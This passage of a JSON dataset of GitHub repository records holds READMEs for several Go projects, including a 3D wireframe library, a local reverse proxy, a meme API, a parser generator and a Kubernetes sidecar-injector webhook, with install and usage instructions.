options:\n --advertise addr : advertise address (default: network bound address)\n\nAdvanced options:\n --nosync : turn off syncing data to disk after every write. This leads\n to faster write operations but opens up the chance for data\n loss due to catastrophic events such as power failure.\n --openreads : allow followers to process read commands, but with the\n possibility of returning stale data.\n --localtime : have the raft machine time synchronized with the local\n server rather than the public internet. This will run the\n risk of time shifts when the local server time is\n drastically changed during live operation.\n --restore path : restore a raft machine from a snapshot file. This will\n start a brand new single-node cluster using the snapshot as\n initial data. The other nodes must be re-joined. 
This\n operation is ignored when a data directory already exists.\n Cannot be used with -j flag.\n```\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/pinhole", "link": "https://github.com/tidwall/pinhole", "tags": ["graphics"], "stars": 553, "description": "3D Wireframe Drawing Library for Go", "lang": "Go", "repo_lang": "", "readme": "# `pinhole`\n\n\"GoDoc\"\n\n3D Wireframe Drawing Library for Go\n\n[Javascript Version](https://github.com/tidwall/pinhole-js) \n[Demo](https://tidwall.com/pinhole/)\n\n\n\"earth\"\"shapes\"\n\"spiral\"\"gopher\"\n\n## Why does this exist?\n\nI needed a CPU based 3D rendering library with a very simple API for visualizing data structures. No bells or whistles, just clean lines and solid colors.\n\n## Getting Started\n\n### Installing\n\nTo start using `pinhole`, install Go and run `go get`:\n\n```sh\n$ go get -u github.com/tidwall/pinhole\n```\n\nThis will retrieve the library.\n\n### Using\n\nThe coordinate space has a locked origin of `0,0,0` with the min/max boundaries of `-1,-1,-1` to `+1,+1,+1`.\nThe `Z` coordinate extends from `-1` (nearest) to `+1` (farthest).\n\nThere are four types of shapes; `line`, `cube`, `circle`, and `dot`. \nThese can be transformed with the `Scale`, `Rotate`, and `Translate` functions.\nMultiple shapes can be transformed by nesting in a `Begin/End` block.\n\n\nA simple cube:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\n\nRotate the cube:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.Rotate(math.Pi/3, math.Pi/6, 0)\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\nAdd, rotate, and transform a circle:\n\n```go\np := pinhole.New()\np.DrawCube(-0.3, -0.3, -0.3, 0.3, 0.3, 0.3)\np.Rotate(math.Pi/3, math.Pi/6, 0)\n\np.Begin()\np.DrawCircle(0, 0, 0, 0.2)\np.Rotate(0, math.Pi/2, 0)\np.Translate(-0.6, -0.4, 0)\np.Colorize(color.RGBA{255, 0, 0, 255})\np.End()\n\np.SavePNG(\"cube.png\", 500, 500, nil)\n```\n\n\n\n## Contact\n\nJosh Baker [@tidwall](http://twitter.com/tidwall)\n\n## License\n\n`pinhole` source code is available under the ISC [License](/LICENSE).\n\n", "readme_type": "markdown", "hn_comments": "good library!Is it weird that I saw this and the first thing I wanted to see it used for was a browser port of Elite?the code seems to be at https://github.com/tidwall/pinhole-js in case anyone else needs to take a look.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cristianoliveira/ergo", "link": "https://github.com/cristianoliveira/ergo", "tags": ["proxy", "tools", "golang", "proxy-server", "development", "development-environment", "developer-tools", "ergo", "reverse-proxy", "osx", "linux", "windows", "web-proxy", "microservices", "distributed-systems"], "stars": 553, "description": "The management of multiple apps running over different ports made easy", "lang": "Go", "repo_lang": "", "readme": "\n# Ergo [![GoDoc](https://godoc.org/github.com/cristianoliveira/ergo?status.svg)](https://godoc.org/github.com/cristianoliveira/ergo) [![Go Report Card](https://goreportcard.com/badge/github.com/cristianoliveira/ergo)](https://goreportcard.com/report/github.com/cristianoliveira/ergo) [![unix build](https://img.shields.io/travis/cristianoliveira/ergo.svg?label=unix)](https://travis-ci.org/cristianoliveira/ergo) [![win 
build](https://img.shields.io/appveyor/ci/cristianoliveira/ergo.svg?label=win)](https://ci.appveyor.com/project/cristianoliveira/ergo) [![codecov](https://codecov.io/gh/cristianoliveira/ergo/branch/master/graph/badge.svg)](https://codecov.io/gh/cristianoliveira/ergo)\n\n

\n\nErgo Proxy - The reverse proxy agent for local domain management.\n\nThe management of multiple apps running over different ports made easy through custom local domains.
\n\n## Demo\n\n\n\nSee more on [examples](https://github.com/cristianoliveira/ergo/tree/master/examples)\n\n## Summary\n* [Philosophy](#philosophy)\n* [Installation](#installation)\n - [osx](#osx)\n - [linux](#linux)\n - [windows](#windows)\n* [Usage](#usage)\n* [Configuration](#configuration)\n* [Testing](#run-tests)\n* [Contributing](#contributing)\n\n### Philosophy\n\nErgo's goal is to be a simple reverse proxy that follows the [Unix philosophy](https://en.wikipedia.org/wiki/Unix_philosophy) of doing only one thing and doing it well. Simplicity means no magic involved. Just a flexible reverse proxy which extends the well-known `/etc/hosts` declaration.\n\n**Feedback**\n\nThis project is constantly undergoing development, however, it's ready to use. Feel free to provide\nfeedback as well as open issues. All suggestions and contributions are welcome. :)\n\nFor help and feedback you can find us at #ergo-proxy channel on https://gopher.slack.com\n\n## Why?\n\nDealing with multiple apps locally, and having to remember each port representing each microservice is frustrating. I wanted a simple way to assign each service a proper local domain. Ergo solves this problem.\n\n## Installation\n\n**Important** These are the only official ways to install ergo.\n\n### OSX\n```\nbrew tap cristianoliveira/tap\nbrew install ergo\n```\n\n### Linux\n```\ncurl -s https://raw.githubusercontent.com/cristianoliveira/ergo/master/install.sh | sh\n```\n\n### Windows\n\nFrom powershell run:\n\n```\nInvoke-WebRequest https://raw.githubusercontent.com/cristianoliveira/ergo/master/install.ps1 -out ./install.ps1; ./install.ps1\n```\n\n_You can also find the Windows executables in [release](https://github.com/cristianoliveira/ergo/releases)._\n\n***Disclaimer:***\nI use Unix-based systems on a daily basis, so I am not able to test each build alone. :(\n\n### Go\n```\ngo install github.com/cristianoliveira/ergo\n```\nMake sure you have `$GOPATH/bin` in your path: `export PATH=$PATH:$GOPATH/bin`\n\n## Usage\n\nErgo looks for a `.ergo` file inside the current directory. It must contain the names and URL of the services following the same format as `/etc/hosts` (`domain`+`space`+`url`). The main difference is it also considers the specified port.\n\n### Simplest Setup\n\n**You need to set the `http://127.0.0.1:2000/proxy.pac` configuration on your system network config.**\n\nErgo comes with a setup command that can configure it for you. The current systems supported are:\n\n - osx\n - linux-gnome\n - windows\n\n```bash\nergo setup \n```\n\nIn case of errors / it doesn't work, please look at the detailed config session below.\n\n### Adding Services and Running\n\n#### OS X / Linux\n```\necho \"ergoproxy http://localhost:3000\" > .ergo\nergo run\n```\n\nNow you should be able to access: `http://ergoproxy.dev`.\nErgo redirects anything ending with `.dev` to the configured url.\n\n#### Windows\nYou should not use the default `.dev` domain, we suggest `.test` instead (see [#58](https://github.com/cristianoliveira/ergo/issues/58)) unless your service supports https out of the box and you have already a certificate\n```\nset ERGO_DOMAIN=.test\necho ergoproxy http://localhost:3000 > .ergo\nergo list # you shouldn't see any quotas in the output\nergo run\n```\nNow you should be able to access: `http://ergoproxy.test`.\nErgo redirects anything ending with `.test` to the configured url.\n\nSimple, right? No magic involved.\n\nDo you want to add more services? 
It's easy, just add more lines in `.ergo`:\n```\necho \"otherservice http://localhost:5000\" >> .ergo\nergo list\nergo run\n```\n\nRestart the ergo server and access: `http://otherservice.dev`\n\n`ergo add otherservice http://localhost:5000` is a shorthand for appending lines to `./.ergo`\n\n### Ergo's configuration\n\nErgo accepts different configurations like run in different `port` (default: 2000) and change `domain` (default: dev). You can find all this configs on ergo's help running `ergo -h`.\n\n## Configuration\n\nIn order to use Ergo domains you need to set it as a proxy. Set the `http://127.0.0.1:2000/proxy.pac` on:\n\n### Networking Web Proxy\n\n#### OS X\n\n`Network Preferences > Advanced > Proxies > Automatic Proxy Configuration`\n\n#### Windows\n\n`Settings > Network and Internet > Proxy > Use setup script`\n\n#### Linux\n\nOn Ubuntu\n\n`System Settings > Network > Network Proxy > Automatic`\n\nFor other distributions, check your network manager and look for proxy configuration. Use browser configuration as an alternative.\n\n### Browser configuration\n\nBrowsers can be configured to use a specific proxy. Use this method as an alternative to system-wide configuration.\n\nKeep in mind that if you requested the site before setting the proxy properly, you have to reset the cache of the browser or change the name of the service. In `incognito` windows cache is disabled by default, so you can use them if you don't wish to delete the cache\n\nAlso you should not use the default `.dev` domain, we suggest `.test` instead (see [#58](https://github.com/cristianoliveira/ergo/issues/58)) unless your service supports https out of the box and you have already a certificate\n\n#### Chrome\n\nExit Chrome and start it using the following option:\n\n```sh\n# Linux\n$ google-chrome --proxy-pac-url=http://localhost:2000/proxy.pac\n\n# OS X\n$ open -a \"Google Chrome\" --args --proxy-pac-url=http://localhost:2000/proxy.pac\n```\n\n#### Firefox\n\n##### through menus and mouse\n1. Click the hamburger button otherwise click on \"Edit\" Menu\n1. then \"Preferences\"\n1. then \"Settings\" button at the bottom of the page (\"General\" active in sidebar) with title \"Network Settings\"\n1. check `Automatic Proxy configuration URL` and enter value `http://localhost:2000/proxy.pac` below\n1. hit \"ok\"\n\n\n##### from about:config\n`network.proxy.autoconfig_url` -> `http://localhost:2000/proxy.pac`\n\n\n### Using on terminal\n\nIn order to use ergo as your web proxy on terminal you must set the `http_proxy` variable. (Only for linux/osx)\n\n```sh\nexport http_proxy=\"http://localhost:2000\"\n```\n\n### Ephemeral Setup\n\nAs an alternative you can see the scripts inside `/resources` for running an\nephemeral setup. 
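\n\nA single program can also be pointed at the Ergo proxy directly, without touching the system-wide or terminal settings above. Below is a minimal, purely illustrative Go sketch; the `ergoproxy` service name and port 2000 come from the examples earlier in this README, everything else is an assumption:\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"io\"\n\t\"net/http\"\n\t\"net/url\"\n)\n\nfunc main() {\n\t// Route this client's requests through the Ergo proxy (port 2000 is Ergo's default).\n\tproxyURL, err := url.Parse(\"http://127.0.0.1:2000\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tclient := &http.Client{\n\t\tTransport: &http.Transport{Proxy: http.ProxyURL(proxyURL)},\n\t}\n\n\t// \"ergoproxy\" is the service name declared in the .ergo file above.\n\tresp, err := client.Get(\"http://ergoproxy.dev\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tbody, _ := io.ReadAll(resp.Body)\n\tfmt.Println(resp.Status, len(body), \"bytes\")\n}\n```\n\nComing back to the ephemeral setup: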
Those scripts set the proxy only while `ergo` is running.\n\n## Contributing\n - Fork it!\n - Create your feature branch: `git checkout -b my-new-feature`\n - Commit your changes: `git commit -am 'Add some feature'`\n - Push to the branch: `git push origin my-new-feature`\n - Submit a pull request, they are welcome!\n - Please include unit tests in your pull requests\n\n## Development\n\nMinimal required golang version `go1.17.6`.\nWe recommend using [GVM](https://github.com/moovweb/gvm) for managing\nyour go versions.\n\nThen simply run:\n```sh\ngvm use $(cat .gvmrc)\n```\n\n### Building\n\n```sh\n make all\n```\n\n## Testing\n\n ```sh\n make test\n make test-integration # Requires admin permission so use it carefully.\n```\n\n# License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "If it meets the guidelines, this might make a good 'Show HN'. Show HN guidelines: https://news.ycombinator.com/showhn.html", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "D3vd/Meme_Api", "link": "https://github.com/D3vd/Meme_Api", "tags": ["reddit", "meme", "memes", "meme-api", "api"], "stars": 553, "description": "Summon a random meme at will", "lang": "Go", "repo_lang": "", "readme": "# Meme API\r\n\r\n\u26a0\ufe0f Heroku has discontinued support for free Dynos, so the old Domain `meme-api.herokuapp.com` has stopped working \u26a0\ufe0f\r\n\r\nPlease update your apps to the new Domain `meme-api.com` to continue using the API\r\n\r\n[![CodeFactor](https://www.codefactor.io/repository/github/d3vd/meme_api/badge)](https://www.codefactor.io/repository/github/d3vd/meme_api)\r\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/8df2a02ea3294423adc74bbf0a13356e)](https://www.codacy.com/gh/D3vd/Meme_Api/dashboard?utm_source=github.com&utm_medium=referral&utm_content=D3vd/Meme_Api&utm_campaign=Badge_Grade)\r\n[![DeepSource](https://deepsource.io/gh/D3vd/Meme_Api.svg/?label=active+issues&show_trend=true)](https://deepsource.io/gh/D3vd/Meme_Api/?ref=repository-badge)\r\n\r\nJSON API for a random meme scraped from reddit.\r\n\r\nAPI Link : [https://meme-api.com/gimme](https://meme-api.com/gimme)\r\n\r\n**Example Response:**\r\n\r\n```jsonc\r\n{\r\n \"postLink\": \"https://redd.it/jiovfz\",\r\n \"subreddit\": \"dankmemes\",\r\n \"title\": \"*leaves call*\",\r\n \"url\": \"https://i.redd.it/f7ibqp1dmiv51.gif\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"Spartan-Yeet\",\r\n \"ups\": 3363,\r\n\r\n // preview images of the meme sorted from lowest to highest quality\r\n \"preview\": [\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=108&crop=smart&format=png8&s=02b12609100c14f55c31fe046f413a9415804d62\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=216&crop=smart&format=png8&s=8da35457641a045e88e42a25eca64c14a6759f82\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=320&crop=smart&format=png8&s=f2250b007b8252c7063b8580c2aa72c5741766ae\",\r\n \"https://preview.redd.it/f7ibqp1dmiv51.gif?width=640&crop=smart&format=png8&s=6cd99df5e58c976bc115bd080a1e6afdbd0d71e7\"\r\n ]\r\n}\r\n```\r\n\r\n## Custom Endpoints\r\n\r\n### Specify count (MAX 50)\r\n\r\nIn order to get multiple memes in a single request specify the count with the following endpoint.\r\n\r\nEndpoint: [/gimme/{count}](https://meme-api.com/gimme/2)\r\n\r\nExample: [https://meme-api.com/gimme/2](https://meme-api.com/gimme/2)\r\n\r\nResponse:\r\n\r\n```jsonc\r\n{\r\n \"count\": 2,\r\n \"memes\": [\r\n {\r\n \"postLink\": \"https://redd.it/jictqq\",\r\n \"subreddit\": 
\"dankmemes\",\r\n \"title\": \"Say sike\",\r\n \"url\": \"https://i.redd.it/j6wu6o9ncfv51.gif\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"n1GG99\",\r\n \"ups\": 72823,\r\n \"preview\": [\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=108&crop=smart&format=png8&s=3b110a4d83a383b7bfebaf09ea60d89619cddfb3\",\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=216&crop=smart&format=png8&s=ba5808992b3245a6518dfe759cbe4af24e042f2d\",\r\n \"https://preview.redd.it/j6wu6o9ncfv51.gif?width=320&crop=smart&format=png8&s=7567bb64e639223e3603236f774eeca149551313\"\r\n ]\r\n },\r\n {\r\n \"postLink\": \"https://redd.it/jilgdw\",\r\n \"subreddit\": \"dankmemes\",\r\n \"title\": \"I forgot how hard it is to think of a title\",\r\n \"url\": \"https://i.redd.it/jk12rq8nrhv51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"TheRealKyJoe01\",\r\n \"ups\": 659,\r\n \"preview\": [\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=108&crop=smart&auto=webp&s=d5d3fe588ccff889e61fca527c2358e429845b80\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=216&crop=smart&auto=webp&s=b560b78301afd8c173f8c702fbd791214c1d7f61\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=320&crop=smart&auto=webp&s=3cd427240b2185a3691a818774214fd2a0de124d\",\r\n \"https://preview.redd.it/jk12rq8nrhv51.jpg?width=640&crop=smart&auto=webp&s=1142cc19a746b8b5d8335679d1d36127f4a677b9\"\r\n ]\r\n }\r\n ]\r\n}\r\n```\r\n\r\n### Specify Subreddit\r\n\r\nBy default the API grabs a random meme from '_memes_', '_dankmemes_', '_me_irl_' subreddits. To provide your own custom subreddit use the following endpoint.\r\n\r\nEndpoint: [/gimme/{subreddit}](https://meme-api.com/gimme/wholesomememes)\r\n\r\nExample: [https://meme-api.com/gimme/wholesomememes](https://meme-api.com/gimme/wholesomememes)\r\n\r\nResponse:\r\n\r\n```json\r\n{\r\n \"postLink\": \"https://redd.it/jhr5lf\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"Every time I visit\",\r\n \"url\": \"https://i.redd.it/hsyyeb87v7v51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"pak_choy\",\r\n \"ups\": 1660,\r\n \"preview\": [\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=108&crop=smart&auto=webp&s=b76ddb91f212b2e304cad2cd9c5b71a6ddca832c\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=216&crop=smart&auto=webp&s=2bd0b104fd0825afc15d9faa7977c6801e6dae0b\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=320&crop=smart&auto=webp&s=7625c69e144c9cb187dd0be88f541918aca5cedd\",\r\n \"https://preview.redd.it/hsyyeb87v7v51.jpg?width=640&crop=smart&auto=webp&s=e933f956e01d62810e68f12ed8b26a8178ecbb0f\"\r\n ]\r\n}\r\n```\r\n\r\n### Specify Subreddit Count (MAX 50)\r\n\r\nIn order to get a custom number of memes from a specific subreddit provide the name of the subreddit and the count in the following endpoint.\r\n\r\nEndpoint: [/gimme/{subreddit}/{count}](https://meme-api.com/gimme/wholesomememes/2)\r\n\r\nExample: [https://meme-api.com/gimme/wholesomememes/2](https://meme-api.com/gimme/wholesomememes/2)\r\n\r\nResponse:\r\n\r\n```json\r\n{\r\n \"count\": 2,\r\n \"memes\": [\r\n {\r\n \"postLink\": \"https://redd.it/ji1riw\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"It makes me feel good.\",\r\n \"url\": \"https://i.redd.it/xuzd77yl8bv51.png\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"polyesterairpods\",\r\n \"ups\": 306,\r\n \"preview\": [\r\n 
\"https://preview.redd.it/xuzd77yl8bv51.png?width=108&crop=smart&auto=webp&s=9a0376741fbda988ceeb7d96fdec3982f102313e\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=216&crop=smart&auto=webp&s=ee2f287bf3f215da9c1cd88c865692b91512476d\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=320&crop=smart&auto=webp&s=88850d9155d51f568fdb0ad527c94d556cd8bd70\",\r\n \"https://preview.redd.it/xuzd77yl8bv51.png?width=640&crop=smart&auto=webp&s=b7418b023b2f09cdc189a55ff1c57d531028bc3e\"\r\n ]\r\n },\r\n {\r\n \"postLink\": \"https://redd.it/jibifc\",\r\n \"subreddit\": \"wholesomememes\",\r\n \"title\": \"It really feels like that\",\r\n \"url\": \"https://i.redd.it/vvpbl29prev51.jpg\",\r\n \"nsfw\": false,\r\n \"spoiler\": false,\r\n \"author\": \"lolthebest\",\r\n \"ups\": 188,\r\n \"preview\": [\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=108&crop=smart&auto=webp&s=cf64f01dfaca5f41c2e87651e4b0e321e28fa47c\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=216&crop=smart&auto=webp&s=33acdf7ed7d943e1438039aa71fe9295ee2ff5a0\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=320&crop=smart&auto=webp&s=6a0497b998bd9364cdb97876aa54c147089270da\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=640&crop=smart&auto=webp&s=e68fbe686e92acb5977bcfc24dd57febd552afaf\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=960&crop=smart&auto=webp&s=1ba690cfe8d49480fdd55c6daee6f2692e9292e7\",\r\n \"https://preview.redd.it/vvpbl29prev51.jpg?width=1080&crop=smart&auto=webp&s=44852004dba921a17ee4ade108980baab242805e\"\r\n ]\r\n }\r\n ]\r\n}\r\n```\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "goccmack/gocc", "link": "https://github.com/goccmack/gocc", "tags": [], "stars": 553, "description": "Parser / Scanner Generator", "lang": "Go", "repo_lang": "", "readme": "# New\nHave a look at [https://github.com/goccmack/gogll](https://github.com/goccmack/gogll) for scannerless GLL parser generation.\n# Gocc\n\n![Build Status](https://github.com/goccmack/gocc/workflows/build/badge.svg)\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/goccmack/gocc)\n[![Go Report Card](https://goreportcard.com/badge/github.com/goccmack/gocc)](https://goreportcard.com/report/github.com/goccmack/gocc)\n\n## Introduction\n\nGocc is a compiler kit for Go written in Go.\n\nGocc generates lexers and parsers or stand-alone DFAs or parsers from a BNF.\n\nLexers are DFAs, which recognise regular languages. Gocc lexers accept UTF-8 input.\n\nGocc parsers are PDAs, which recognise LR-1 languages. Optional LR1 conflict\nhandling automatically resolves shift / reduce and reduce / reduce conflicts.\n\nGenerating a lexer and parser starts with creating a bnf file. Action expressions\nembedded in the BNF allows the user to specify semantic actions for syntax productions.\n\nFor complex applications the user typically uses an abstract syntax tree (AST)\nto represent the derivation of the input. 
The user provides a set of functions\nto construct the AST, which are called from the action expressions specified\nin the BNF.\n\nSee the [README](example/bools/README) for an included example.\n\n[User Guide (PDF): Learn You a gocc for Great Good](https://raw.githubusercontent.com/goccmack/gocc/master/doc/gocc_user_guide.pdf) (gocc3 user guide will be published shortly)\n\n## Installation\n\n* First download and Install Go From http://golang.org/\n* Setup your GOPATH environment variable.\n* Next in your command line run: go get github.com/goccmack/gocc (go get will\n git clone gocc into GOPATH/src/github.com/goccmack/gocc and run go install)\n* Alternatively clone the source: https://github.com/goccmack/gocc . Followed\n by go install github.com/goccmack/gocc\n* Finally, make sure that the bin folder where the gocc binary is located is\n in your PATH environment variable.\n\n## Getting Started\n\nOnce installed, start by creating your BNF in a package folder.\n\nFor example GOPATH/src/foo/bar.bnf:\n\n```\n/* Lexical Part */\n\nid : 'a'-'z' {'a'-'z'} ;\n\n!whitespace : ' ' | '\\t' | '\\n' | '\\r' ;\n\n/* Syntax Part */\n\n<< import \"foo/ast\" >>\n\nHello: \"hello\" id << ast.NewWorld($1) >> ;\n```\n\nNext to use gocc, run:\n\n```sh\ncd $GOPATH/src/foo\ngocc bar.bnf\n```\n\nThis will generate a scanner, parser and token package inside GOPATH/src/foo\nFollowing times you might only want to run gocc without the scanner flag,\nsince you might want to start making the scanner your own. Gocc is after all\nonly a parser generator even if the default scanner is quite useful.\n\nNext create ast.go file at $GOPATH/src/foo/ast with the following contents:\n\n```go\npackage ast\n\nimport (\n \"foo/token\"\n)\n\ntype Attrib interface {}\n\ntype World struct {\n Name string\n}\n\nfunc NewWorld(id Attrib) (*World, error) {\n return &World{string(id.(*token.Token).Lit)}, nil\n}\n\nfunc (this *World) String() string {\n return \"hello \" + this.Name\n}\n```\n\nFinally, we want to parse a string into the ast, so let us write a test at\n$GOPATH/src/foo/test/parse_test.go with the following contents:\n\n```go\npackage test\n\nimport (\n \"foo/ast\"\n \"foo/lexer\"\n \"foo/parser\"\n \"testing\"\n)\n\nfunc TestWorld(t *testing.T) {\n input := []byte(`hello gocc`)\n lex := lexer.NewLexer(input)\n p := parser.NewParser()\n st, err := p.Parse(lex)\n if err != nil {\n panic(err)\n }\n w, ok := st.(*ast.World)\n if !ok {\n t.Fatalf(\"This is not a world\")\n }\n if w.Name != `gocc` {\n t.Fatalf(\"Wrong world %v\", w.Name)\n }\n}\n```\n\nFinally, run the test:\n\n```sh\ncd $GOPATH/src/foo/test\ngo test -v\n```\n\nYou have now created your first grammar with gocc. This should now be relatively\neasy to change into the grammar you actually want to create or use an existing\nLR1 grammar you would like to parse.\n\n## BNF\n\nThe Gocc BNF is specified [here](spec/gocc2.ebnf)\n\nAn example bnf with action expressions can be found [here](example/bools/example.bnf)\n\n## Action Expressions and AST\n\nAn action expression is specified as \"<\", \"<\", goccExpressionList , \">\", \">\" .\nThe goccExpressionList is equivalent to a [goExpressionList](https://golang.org/ref/spec#ExpressionList).\nThis expression list should return an Attrib and an error. 
Where Attrib is:\n\n```go\ntype Attrib interface {}\n```\n\nAlso, parsed elements of the corresponding bnf rule can be represented in the expressionList as \"$\", digit.\n\nSome action expression examples:\n\n```\n<< $0, nil >>\n<< ast.NewFoo($1) >>\n<< ast.NewBar($3, $1) >>\n<< ast.TRUE, nil >>\n```\n\nConstants, functions, etc. that are returned or called should be programmed by\nthe user in his ast (Abstract Syntax Tree) package. The ast package requires\nthat you define your own Attrib interface as shown above. All parameters\npassed to functions will be of this type.\n\nFor raw elements that you know to be a `*token.Token`, you can use the short-hand: `$T0` etc, leading the following expressions to produce identical results:\n\n```\n<< $3.(*token.Token), nil >>\n<< $T3, nil >>\n```\n\nSome example of functions:\n\n```go\nfunc NewFoo(a Attrib) (*Foo, error) { ... }\nfunc NewBar(a, b Attrib) (*Bar, error) { ... }\n```\n\nAn example of an ast can be found [here](example/bools/ast/ast.go)\n\n## Users\n\nThese projects use gocc:\n\n* [gogo](https://github.com/shivansh/gogo) - [BNF file](https://github.com/shivansh/gogo/blob/master/src/lang.bnf) - a Go to MIPS compiler written in Go\n* [gonum/gonum](https://github.com/gonum/gonum) - [BNF file](https://github.com/gonum/gonum/blob/master/graph/formats/dot/internal/dot.bnf) - DOT decoder (part of the graph library of Gonum)\n* [llir/llvm](https://github.com/llir/llvm) - [BNF file](https://github.com/llir/llvm/blob/28149269dab73cc63915a9c2c6c7b25dbd4db027/asm/internal/ll.bnf) - LLVM IR library in pure Go\n* [mewmew/uc](https://github.com/mewmew/uc) - [BNF file](https://github.com/mewmew/uc/blob/master/gocc/uc.bnf) - A compiler for the \u00b5C language\n* [gographviz](https://github.com/awalterschulze/gographviz) - [BNF file](https://github.com/awalterschulze/gographviz/blob/master/dot.bnf) - Parses the Graphviz DOT language in golang\n* [katydid/relapse](http://katydid.github.io/) - [BNF file](https://github.com/katydid/katydid/blob/master/relapse/bnf/all.bnf) - Encoding agnostic validation language\n* [skius/stringlang](https://github.com/skius/stringlang) - [BNF file](https://github.com/skius/stringlang/blob/main/lang.bnf) - An interpreter for the expression-oriented language StringLang\n* [miller](https://github.com/johnkerl/miller) - [BNF file](https://github.com/johnkerl/miller/blob/main/internal/pkg/parsing/mlr.bnf) - Miller is like awk, sed, cut, join, and sort for name-indexed data such as CSV, TSV, and tabular JSON.\n* [nesgo](https://github.com/retroenv/nesgo) - [BNF file](https://github.com/retroenv/nesgo/blob/main/internal/gocc/lang.bnf) - A Go compiler for NES\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "morvencao/kube-sidecar-injector", "link": "https://github.com/morvencao/kube-sidecar-injector", "tags": [], "stars": 553, "description": "A Kubernetes mutating webhook server that implements sidecar injection", "lang": "Go", "repo_lang": "", "readme": "# kube-sidecar-injector\n\nThis repo is used for [a tutorial at Medium](https://medium.com/ibm-cloud/diving-into-kubernetes-mutatingadmissionwebhook-6ef3c5695f74) to create a Kubernetes [MutatingAdmissionWebhook](https://kubernetes.io/docs/admin/admission-controllers/#mutatingadmissionwebhook-beta-in-19) that injects a nginx sidecar container into pod prior to persistence of the object.\n\n## Prerequisites\n\n- [git](https://git-scm.com/downloads)\n- [go](https://golang.org/dl/) version v1.17+\n- 
[docker](https://docs.docker.com/install/) version 19.03+\n- [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) version v1.19+\n- Access to a Kubernetes v1.19+ cluster with the `admissionregistration.k8s.io/v1` API enabled. Verify that with the following command:\n\n```\nkubectl api-versions | grep admissionregistration.k8s.io\n```\nThe result should be:\n```\nadmissionregistration.k8s.io/v1\nadmissionregistration.k8s.io/v1beta1\n```\n\n> Note: In addition, the `MutatingAdmissionWebhook` and `ValidatingAdmissionWebhook` admission controllers should be added and listed in the correct order in the admission-control flag of kube-apiserver.\n\n## Build and Deploy\n\n1. Build and push the docker image:\n\n```bash\nmake docker-build docker-push IMAGE=quay.io//sidecar-injector:latest\n```\n\n2. Deploy the kube-sidecar-injector to the kubernetes cluster:\n\n```bash\nmake deploy IMAGE=quay.io//sidecar-injector:latest\n```\n\n3. Verify the kube-sidecar-injector is up and running:\n\n```bash\n# kubectl -n sidecar-injector get pod\nNAME READY STATUS RESTARTS AGE\nsidecar-injector-7c8bc5f4c9-28c84 1/1 Running 0 30s\n```\n\n## How to use\n\n1. Create a new namespace `test-ns` and label it with `sidecar-injection=enabled`:\n\n```\n# kubectl create ns test-ns\n# kubectl label namespace test-ns sidecar-injection=enabled\n# kubectl get namespace -L sidecar-injection\nNAME STATUS AGE SIDECAR-INJECTION\ndefault Active 26m\ntest-ns Active 13s enabled\nkube-public Active 26m\nkube-system Active 26m\nsidecar-injector Active 17m\n```\n\n2. Deploy an app in the Kubernetes cluster, taking the `alpine` app as an example:\n\n```bash\nkubectl -n test-ns run alpine \\\n --image=alpine \\\n --restart=Never \\\n --command -- sleep infinity\n```\n\n3. Verify that the sidecar container is injected:\n\n```\n# kubectl -n test-ns get pod\nNAME READY STATUS RESTARTS AGE\nalpine 2/2 Running 0 10s\n# kubectl -n test-ns get pod alpine -o jsonpath=\"{.spec.containers[*].name}\"\nalpine sidecar-nginx\n```\n\n## Troubleshooting\n\nSometimes you may find that the pod is not injected with the sidecar container as expected. In that case, check the following items:\n\n1. The sidecar-injector pod is in the running state and has no error logs.\n2. The namespace in which the application pod is deployed has the correct label (`sidecar-injection=enabled`) as configured in 